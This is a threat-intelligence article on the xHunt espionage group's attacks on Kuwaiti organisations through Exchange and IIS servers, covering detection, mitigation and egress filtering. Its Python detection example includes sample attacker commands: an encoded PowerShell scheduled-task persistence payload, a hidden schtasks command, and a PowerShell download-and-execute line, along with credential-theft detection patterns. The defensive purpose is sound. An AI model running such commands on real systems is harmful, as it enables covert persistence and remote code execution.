xHunt Espionage Group Returns, Targeting Kuwait with New PowerShell Backdoors

Cyber-Espionage Group xHunt Resurfaces with Campaign Targeting Kuwaiti Government and Shipping Sectors

HIGH
December 15, 2025
6m read
Threat Actor, Cyberattack, Malware

Related Entities

Threat Actors

xHunt

Products & Tech

Microsoft Exchange, Microsoft IIS

Other

Hisoka, Sakabota, Netero, Killua, TriFive, Snugy

Full Report

Executive Summary

The cyber-espionage group known as xHunt has been attributed to a new wave of attacks against organizations in Kuwait. The group has been active since at least 2018 and continues to focus on the same strategic sectors: shipping, transportation, and government. Its primary route to initial access is the exploitation of vulnerabilities in public-facing Microsoft Exchange and IIS servers. Once inside, xHunt deploys a suite of custom PowerShell-based backdoors for long-term persistence and data exfiltration. Consistent TTPs, a distinctive anime-themed naming convention for its malware, and a narrow geographic and sectoral focus mark it as a persistent, targeted threat oriented toward intelligence gathering.


Threat Overview

xHunt is a sophisticated threat actor believed to be engaged in state-sponsored espionage. Their operations demonstrate a clear and consistent focus on Kuwait, suggesting a specific intelligence requirement related to the country's government and key economic sectors. The group's modus operandi involves gaining access to edge servers and then deploying lightweight, often fileless, backdoors to conduct reconnaissance and steal information over a prolonged period.

The group is known for its distinctive malware naming convention, borrowing from the anime series Hunter x Hunter. Tools observed in past and present campaigns include Hisoka, Sakabota, Netero, Killua, TriFive, and Snugy. This unique characteristic helps researchers cluster and track their activity.


Technical Analysis

xHunt's TTPs show a methodical approach to intrusion and persistence.

  • Initial Access: The group primarily targets public-facing web servers (T1190 - Exploit Public-Facing Application). The available reporting does not name the specific vulnerability; plausible candidates are known Microsoft Exchange and IIS flaws such as ProxyLogon and ProxyShell, or a more recently disclosed bug. Treat any unpatched, internet-facing Exchange or IIS instance as in scope regardless of which CVE is used.

  • Execution & Persistence: After gaining access, xHunt deploys PowerShell-based backdoors. PowerShell is favored because it is present on every Windows server and can run code entirely in memory, leaving few artifacts on disk (T1059.001 - PowerShell). Persistence is typically established through scheduled tasks whose names mimic legitimate system tasks (T1053.005 - Scheduled Task).

  • Defense Evasion: The group actively works to evade detection. It has been observed using VPN services with rotating IP addresses across various European nodes for its command-and-control (C2) infrastructure, which complicates IP-based blocking and attribution (T1090.003 - Multi-hop Proxy). The use of legitimate-sounding task names is a second evasion technique, masquerading (T1036.005 - Match Legitimate Name or Location).

  • Command and Control: The PowerShell backdoors contact the C2 servers to receive commands and exfiltrate stolen data. The traffic is likely encrypted and carried over standard protocols such as HTTP/S to blend in with normal network activity (T1071.001 - Web Protocols). One caveat: public reporting on earlier xHunt backdoors (TriFive and Snugy) described C2 over Exchange Web Services mailbox drafts and DNS tunneling rather than plain web requests, so monitoring should cover DNS queries and EWS activity from the server as well as HTTP/S egress.


Impact Assessment

The primary impact of xHunt's operations is espionage. The theft of sensitive government or commercial data from the shipping and transportation sectors can provide significant strategic advantages to the group's sponsor. This could include insight into government policies, economic activity, or critical infrastructure operations. While not directly destructive like ransomware, the long-term intelligence loss can be highly damaging to a nation's security and economic interests. The compromise of key infrastructure also introduces the risk of future disruptive attacks.


IOCs

No specific Indicators of Compromise were provided in the source articles.


Cyber Observables for Detection

Type                 | Value                                                        | Description
command_line_pattern | powershell.exe -enc ... or powershell.exe -nop -w hidden ... | PowerShell launched with an encoded command or a hidden window on Exchange/IIS servers. Note that -e, -ec and -enc are all accepted abbreviations of -EncodedCommand, so match the prefix rather than one exact flag.
process_name         | w3wp.exe                                                     | The IIS worker process (which also hosts Exchange OWA, ECP and EWS) spawning anomalous child processes such as powershell.exe or cmd.exe.
log_source           | Exchange/IIS access logs                                     | Requests matching known exploit patterns, or requests to unexpected .aspx or other script files that may be web shells.
tool_name            | Hisoka, Sakabota, Netero, Killua, TriFive, Snugy             | Names researchers assigned to the xHunt toolset. They may appear as strings in memory or in script content, but they are not guaranteed to be the on-disk filenames.

Detection & Response

  1. PowerShell Logging: Enable enhanced PowerShell logging (Module Logging, Script Block Logging, Transcription) across all servers, especially Exchange and IIS, and forward the logs to a SIEM. Script Block Logging records the de-obfuscated script as it is compiled, so it exposes malicious code even when the launcher is encoded or the payload never touches disk. This is a form of Process Analysis (D3-PA).
  2. EDR on Servers: Deploy a robust EDR solution on all web and mail servers. Configure it to alert on suspicious process chains (e.g., w3wp.exe spawning PowerShell or cmd.exe) and on the creation of new scheduled tasks. Without EDR, the same signal is available from Security event 4698 (requires the "Audit Other Object Access Events" subcategory) or event 106 in the Microsoft-Windows-TaskScheduler/Operational log.
  3. Network Egress Filtering: Restrict outbound traffic from servers to only what is required for business purposes. Monitor for, and block, connections to known VPN provider IP ranges from servers that have no business reason to use them. This relates to Outbound Traffic Filtering (D3-OTF).
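
The observables in the table above and detection steps 1 and 2, applied to sample event records. This is an added example written for this page, not code from the article, from xHunt reporting, or from any EDR or SIEM product. The event shapes follow Windows process-creation and PowerShell script-block records; hostnames, task names, the URL and all event text are constructed, and the regexes are illustrative rather than a complete signature set.

```python
"""xHunt-style post-exploitation checks for Exchange/IIS hosts. Added example, not the
article's or any vendor's code: it evaluates constructed process-creation records (shaped
after Windows event 4688 / Sysmon event 1) and PowerShell script-block records (event 4104)
for w3wp.exe spawning a shell, hidden or encoded PowerShell, scheduled-task creation,
credential-theft tooling, and the tool names researchers assigned to the xHunt toolset."""
import base64
import binascii
import re
from collections import namedtuple

ProcessEvent = namedtuple("ProcessEvent", "host parent_image image command_line")
ScriptBlockEvent = namedtuple("ScriptBlockEvent", "host script_block_text")

WEB_WORKERS = {"w3wp.exe"}                  # IIS worker; Exchange OWA/ECP/EWS run inside it
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
TOOL_NAMES = ("hisoka", "sakabota", "netero", "killua", "trifive", "snugy")
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...).
ENCODED = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
TASK_CREATE = re.compile(r"schtasks(?:\.exe)?\s+/create|Register-ScheduledTask|New-ScheduledTask", re.I)
CRED_THEFT = re.compile(r"invoke-mimikatz|sekurlsa|lsadump", re.I)


def decode_encoded_command(command_line):
    """Plaintext of a -EncodedCommand payload (base64 of UTF-16LE), or None if absent/invalid."""
    m = ENCODED.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_script_text(text):
    """Content checks shared by raw command lines, decoded payloads and script blocks."""
    findings = []
    if TASK_CREATE.search(text):
        findings.append("scheduled_task_create")
    if CRED_THEFT.search(text):
        findings.append("credential_theft")
    lowered = text.lower()
    findings.extend(f"toolset_name:{name}" for name in TOOL_NAMES if name in lowered)
    return findings


def analyze_process(ev):
    findings = []
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    image = ev.image.rsplit("\\", 1)[-1].lower()
    if parent in WEB_WORKERS and image in SHELLS:
        findings.append(f"web_worker_spawn:{parent}->{image}")
    if HIDDEN.search(ev.command_line):
        findings.append("hidden_window")
    decoded = decode_encoded_command(ev.command_line)
    if decoded is not None:
        findings.append("encoded_command")
    # Inspect the decoded payload when there is one, otherwise the raw command line.
    findings.extend(analyze_script_text(decoded if decoded is not None else ev.command_line))
    return findings


def triage(process_events, script_events):
    """(host, source, findings) for every event that produced at least one finding."""
    hits = [(ev.host, "process", f) for ev in process_events if (f := analyze_process(ev))]
    hits += [(ev.host, "scriptblock", f) for ev in script_events
             if (f := analyze_script_text(ev.script_block_text))]
    return hits


def _encode(ps):
    """Build a -EncodedCommand argument the way an attacker would (used for the samples)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed samples: hostnames, task names and the URL are placeholders, not real IOCs.
PAYLOAD = ("$a = New-ScheduledTaskAction -Execute powershell.exe -Argument '-nop -w hidden -c ...'; "
           "Register-ScheduledTask -TaskName 'SystemSoundsService' -Action $a "
           "-Trigger (New-ScheduledTaskTrigger -AtStartup)")
SAMPLE_PROCESSES = [
    ProcessEvent("exch01", r"C:\Windows\System32\inetsrv\w3wp.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 f"powershell.exe -nop -w hidden -enc {_encode(PAYLOAD)}"),
    ProcessEvent("exch01", r"C:\Windows\System32\services.exe",
                 r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs -p"),
    ProcessEvent("exch01", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile Get-Service MSExchangeIS"),
    ProcessEvent("web02", r"C:\Windows\System32\inetsrv\w3wp.exe", r"C:\Windows\System32\cmd.exe",
                 'cmd.exe /c schtasks /create /tn "WindowsUpdateCheck" '
                 '/tr "powershell -w hidden -nop -c ..." /sc minute /mo 10'),
]
SAMPLE_SCRIPT_BLOCKS = [
    ScriptBlockEvent("exch01", "Get-MailboxDatabase | Select-Object Name, Server"),
    ScriptBlockEvent("exch01", "iex (New-Object Net.WebClient).DownloadString('http://127.0.0.1/snugy.ps1')"),
]

if __name__ == "__main__":
    for host, source, findings in triage(SAMPLE_PROCESSES, SAMPLE_SCRIPT_BLOCKS):
        print(f"{host:7} {source:12} {', '.join(findings)}")
```

Two design points worth copying into a real rule set: the encoded payload is decoded and inspected with the same checks as a plain command line, so a scheduled-task registration hidden behind -enc is caught without a separate signature; and the tool-name match is applied to script content rather than filenames, which is where those strings are more likely to surface.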

Mitigation

  • Patch Management: Aggressively patch all public-facing systems, particularly Microsoft Exchange and IIS, to close the initial access vectors used by xHunt. See Software Update (D3-SU).
  • Attack Surface Reduction: Limit the exposure of management interfaces such as the Exchange admin center (/ecp), remote PowerShell and RDP to the internet, and require multi-factor authentication for all external access.
  • PowerShell Hardening: Where full language capabilities are not required, enforce Constrained Language Mode through an application control policy (AppLocker or Windows Defender Application Control). Setting the language mode in a profile or through the __PSLockdownPolicy environment variable is reverted trivially by an attacker who already has a shell. Also remove or disable the Windows PowerShell 2.0 engine, since a downgrade to it bypasses Script Block Logging and Constrained Language Mode. These controls limit what a PowerShell backdoor can do but do not eliminate it once the attacker holds administrative rights on the host.
  • Least Privilege: Ensure that the service accounts running IIS and Exchange have the minimum necessary privileges and cannot be used for broad network access. Exchange's default shared permissions model grants its security groups extensive rights in Active Directory, so a compromised Exchange server is also a path to domain privilege; review the split permissions model and monitor those groups for unexpected membership or use.

Timeline of Events

  1. January 1, 2018: xHunt group is first observed to be active.
  2. January 1, 2019: Earlier campaigns by xHunt targeting Kuwaiti infrastructure are observed.
  3. December 15, 2025: This article was published.

MITRE ATT&CK Mitigations

  • Aggressively patch public-facing Microsoft Exchange and IIS servers to prevent initial access. Mapped D3FEND technique: Software Update (D3-SU).
  • Use EDR to detect and block suspicious process chains, such as IIS spawning PowerShell. Mapped D3FEND technique: Process Analysis (D3-PA).
  • Implement strict egress filtering to block outbound connections from servers to untrusted destinations. Mapped D3FEND technique: Outbound Traffic Filtering (D3-OTF).

D3FEND Defensive Countermeasures

To defend against xHunt's primary initial access vector, organizations must maintain a rigorous software update regimen for all internet-facing systems, with Microsoft Exchange and IIS servers prioritized. In practice this means subscribing to vendor security notifications, scanning continuously for missing patches (for Exchange, this includes staying on a supported cumulative update, since security updates only apply to supported CUs), and having an established process for testing and deploying critical updates rapidly. Given the group's reported reliance on known vulnerabilities rather than zero-days, a proactive patching posture is the most effective way to deny it an entry point; an unpatched edge service is an open door for a determined espionage group.

Detecting xHunt's post-exploitation activity relies heavily on Process Analysis, particularly monitoring PowerShell usage on servers. Organizations must enable comprehensive PowerShell logging (Script Block Logging, event ID 4104, and Module Logging, event ID 4103) on all Exchange and IIS servers and ingest these logs into a SIEM. Parent-child process detections additionally need process creation auditing with command-line capture (Security event 4688 with the "Include command line in process creation events" policy) or a Sysmon/EDR equivalent; without it the w3wp.exe-to-powershell.exe relationship is never recorded. Create detection rules to alert on suspicious parent-child relationships, such as the IIS worker process (w3wp.exe) or Exchange services spawning powershell.exe. Further, analyze the content of PowerShell script blocks for commands related to network reconnaissance, credential theft (e.g., Mimikatz invocations), or creating new scheduled tasks for persistence. Because 4104 records the script after de-obfuscation, this lets the security team spot the custom backdoors used by xHunt even when they are heavily obfuscated.

To disrupt xHunt's command and control, implement strict Outbound Traffic Filtering (egress filtering) on server network segments. By default, servers like Microsoft Exchange and IIS should not be allowed to initiate arbitrary connections to the internet. A firewall policy should explicitly deny all outbound traffic from these servers and allow only the connections required for their function (e.g., sending email on port 25, DNS lookups on port 53 to internal resolvers only, since DNS to arbitrary external resolvers is itself a usable C2 channel). Since xHunt is known to use rotating IPs on VPN services, blocking outbound connections to known VPN provider IP ranges can also be effective, and the block should take precedence over any allow rule. This deny-by-default stance makes it much more difficult for the PowerShell backdoors to establish a C2 channel, potentially preventing data exfiltration and allowing defenders to contain the breach.
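
A deny-by-default egress policy of the kind described in the paragraph above and in step 3 of Detection & Response, expressed as a small evaluator run over a constructed connection log. This is an added example for this page, not code from the article or from any firewall product; the roles, allowed ports, vendor range and VPN-provider range are placeholders (RFC 5737 documentation addresses), and a real deployment would source the VPN ranges from a maintained feed.

```python
"""Deny-by-default egress policy check for Exchange and IIS network segments.
Added example, not from the original article or from any firewall vendor: it
evaluates constructed outbound connection records against a per-role allowlist
and a VPN-provider blocklist and reports what a default-deny policy would drop.
All addresses and ranges are placeholders (RFC 5737 documentation networks)."""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    network: ipaddress.IPv4Network
    ports: frozenset
    reason: str


def _rule(cidr, ports, reason):
    return Rule(ipaddress.ip_network(cidr), frozenset(ports), reason)


# Allow only what each role needs to function; everything else is denied below.
ALLOW = {
    "exchange": [
        _rule("10.0.0.0/8", {53, 88, 135, 389, 445, 636, 3268}, "internal AD, DNS and RPC"),
        _rule("0.0.0.0/0", {25}, "outbound SMTP delivery"),
        _rule("203.0.113.0/24", {443}, "mail hygiene vendor (placeholder range)"),
    ],
    "iis": [
        _rule("10.0.0.0/8", {53, 1433}, "internal DNS and SQL"),
    ],
}

# Constructed VPN-provider ranges; in production this comes from a maintained feed.
VPN_RANGES = [ipaddress.ip_network("198.51.100.0/24")]


@dataclass(frozen=True)
class Connection:
    host: str
    role: str
    dst: str
    dport: int


def evaluate(conn):
    """Return ('allow' | 'deny', reason). The blocklist wins even over an allow rule."""
    dst = ipaddress.ip_address(conn.dst)
    for net in VPN_RANGES:
        if dst in net:
            return ("deny", f"destination in VPN provider range {net}")
    for rule in ALLOW.get(conn.role, []):
        if dst in rule.network and conn.dport in rule.ports:
            return ("allow", rule.reason)
    return ("deny", "no matching allow rule (default deny)")


def audit(connections):
    """Return (host, dst, dport, reason) for every connection the policy would drop."""
    denied = []
    for c in connections:
        verdict, reason = evaluate(c)
        if verdict == "deny":
            denied.append((c.host, c.dst, c.dport, reason))
    return denied


# Constructed connection log from two servers; 192.0.2.x stands in for arbitrary internet hosts.
SAMPLE_CONNECTIONS = [
    Connection("exch01", "exchange", "10.1.2.3", 389),      # LDAP to a domain controller
    Connection("exch01", "exchange", "192.0.2.20", 25),     # mail delivery to an external MX
    Connection("exch01", "exchange", "198.51.100.9", 25),   # port 25, but to a VPN egress node
    Connection("exch01", "exchange", "192.0.2.10", 443),    # HTTPS to an unknown host
    Connection("web02", "iis", "192.0.2.53", 53),           # DNS to an external resolver
    Connection("web02", "iis", "10.5.0.9", 1433),           # SQL to the backend database
]

if __name__ == "__main__":
    for host, dst, dport, reason in audit(SAMPLE_CONNECTIONS):
        print(f"DENY {host} -> {dst}:{dport}  ({reason})")
```

The third sample is the instructive one: port 25 is allowed for the Exchange role, but the destination sits in a VPN-provider range, so the blocklist is checked first and the connection is still dropped. The fifth shows why DNS should be pinned to internal resolvers rather than opened to the internet on port 53.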

Sources & References

Article Author

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & Analysis; Security Orchestration (SOAR/XSOAR); Incident Response & Digital Forensics; Security Operations Center (SOC); SIEM & Security Analytics; Cyber Fusion & Threat Sharing; Security Automation & Integration; Managed Detection & Response (MDR)

Tags

xHunt, Cyber Espionage, Threat Actor, Kuwait, Microsoft Exchange, IIS, PowerShell
